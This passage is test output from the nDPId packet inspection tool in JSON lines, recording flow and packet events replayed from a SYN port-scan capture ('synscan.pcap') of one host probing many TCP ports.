+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"synscan.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAs+oEAACwGIfGsEAAIQA2GNIzTEA\/dU4MZAAAAAGACBAAkfQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":411,"source":"synscan.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27356,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"synscan.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsn\/4AACkGf3SsEAAIQA2GNIzTatzdU4MZAAAAAGACCADFrwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":412,"source":"synscan.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5440,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"synscan.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAs32IAADoGLxCsEAAIQA2GNIzTFUDdU4MZAAAAAGACDAAXTAAAAgQFtA=="} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":413,"source":"synscan.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":99,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"synscan.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAswOYAAC0GWoysEAAIQA2GNIzTAGPdU4MZAAAAAGACCAAwKQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"synscan.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"synscan.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAspGsAACYGfgesEAAIQA2GNIzTBBDdU4MZAAAAAGACDAAofAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":415,"source":"synscan.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"synscan.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAs6bIAACsGM8CsEAAIQA2GNIzTFqjdU4MZAAAAAGACEAAR5AAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":416,"source":"synscan.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"synscan.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsNOsAACwG54esEAAIQA2GNIzTD6XdU4MZAAAAAGACBAAk5wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"synscan.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1166,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"synscan.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsv5wAACgGYNasEAAIQA2GNIzTBI7dU4MZAAAAAGACBAAv\/gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"synscan.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"synscan.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAspqkAADMGbsmsEAAIQA2GNIzTBTDdU4MZAAAAAGACEAAjXAAAAgQFtA=="} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"synscan.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"synscan.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsvjkAACUGZTmsEAAIQA2GNIzTAAndU4MZAAAAAGACCAAwgwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"synscan.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"synscan.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAs1ygAAC8GQkqsEAAIQA2GNIzTrdXdU4MZAAAAAGACEAB6tgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"synscan.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"synscan.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsiLIAACsGlMCsEAAIQA2GNIzSC5jdUoMYAAAAAGACEAAc9wAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"synscan.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2909,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"synscan.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsnfMAADkGcX+sEAAIQA2GNIzSC13dUoMYAAAAAGACCAAlMgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"synscan.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2393,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"synscan.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsz0EAACkGUDGsEAAIQA2GNIzSCVndUoMYAAAAAGACCAAnNgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"synscan.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"synscan.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsLKEAADEG6tGsEAAIQA2GNIzSBC7dUoMYAAAAAGACCAAsYQAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"synscan.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"synscan.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsduwAACUGrIasEAAIQA2GNIzSAP7dUoMYAAAAAGACCAAvkQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"synscan.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"synscan.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsXOUAADIGuY2sEAAIQA2GNIzSDsjdUoMYAAAAAGACDAAdxwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":427,"source":"synscan.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"synscan.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsE7oAADAGBLmsEAAIQA2GNIzSJxndUoMYAAAAAGACBAANdgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":428,"source":"synscan.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"synscan.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsWC0AADQGvEWsEAAIQA2GNIzSBEndUoMYAAAAAGACBAAwRgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"synscan.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"synscan.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsBGsAACsGGQisEAAIQA2GNIzSJXndUoMYAAAAAGACEAADFgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"synscan.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"synscan.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsvYYAACoGYOysEAAIQA2GNIzSBH\/dUoMYAAAAAGACDAAoEAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":431,"source":"synscan.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4224,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"synscan.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAstjcAADAGYjusEAAIQA2GNIzSEIDdUoMYAAAAAGACBAAkDwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"synscan.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"synscan.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsMg4AACoG7GSsEAAIQA2GNIzSwBjdUoMYAAAAAGACDABsdgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"synscan.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"synscan.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsVwMAACwGxW+sEAAIQA2GNIzSH0DdUoMYAAAAAGACBAAVTwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":434,"source":"synscan.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"synscan.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAstAkAAC0GZ2msEAAIQA2GNIzSBAPdUoMYAAAAAGACCAAsjAAAAgQFtA=="} 